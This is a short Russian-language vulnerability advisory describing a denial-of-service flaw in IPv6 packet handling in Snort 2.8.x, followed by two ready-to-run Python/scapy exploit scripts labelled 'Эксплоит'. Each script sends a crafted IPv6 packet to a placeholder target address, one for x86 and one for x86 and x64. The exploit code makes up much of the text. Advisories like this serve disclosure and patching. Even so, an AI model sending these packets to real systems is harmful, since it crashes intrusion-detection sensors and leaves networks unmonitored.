Программа: Snort 2.8.x

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую
систему. Уязвимость существует из-за ошибки в проверке входных данных при
обработке IPv6 пакетов. Атакующий может передать специально сформированные
пакеты, что приведет к отказу системы в обслуживании. Эксплуатирование
уязвимости требует, чтобы Snort была скомпилирована с опцией "—enable-ipv6" и
запущена с опцией командной строки "-v".

Эксплоит:

1) Работает на x86 системах:

#/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP

2) Работает на x86 и x64:

#/usr/bin/env python
from scapy.all import *

z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 ->
icmp (not v6)



Оставить мнение